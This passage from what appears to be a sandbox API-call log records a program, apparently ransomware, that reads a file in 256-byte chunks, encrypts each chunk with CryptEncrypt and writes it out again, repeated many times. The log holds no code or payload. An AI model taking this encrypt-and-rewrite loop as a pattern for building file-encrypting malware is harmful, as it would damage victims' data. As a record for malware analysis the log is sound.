[0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.369] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.369] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.369] GetLastError () returned 0x0 [0166.369] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.370] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.370] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.370] GetLastError () returned 0x0 [0166.370] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.370] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.370] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.370] GetLastError () returned 0x0 [0166.370] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.370] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.370] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.370] GetLastError () returned 0x0 [0166.370] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.370] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.370] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.370] GetLastError () returned 0x0 [0166.370] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.370] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.371] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.371] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.371] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.371] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.371] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.371] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.371] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.371] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.371] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.371] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.371] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.371] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.372] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.372] GetLastError () returned 0x0 [0166.372] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.372] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.373] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.373] GetLastError () returned 0x0 [0166.373] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.373] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.374] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.374] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.374] GetLastError () returned 0x0 [0166.374] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.375] GetLastError () returned 0x0 [0166.375] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.375] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.375] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, 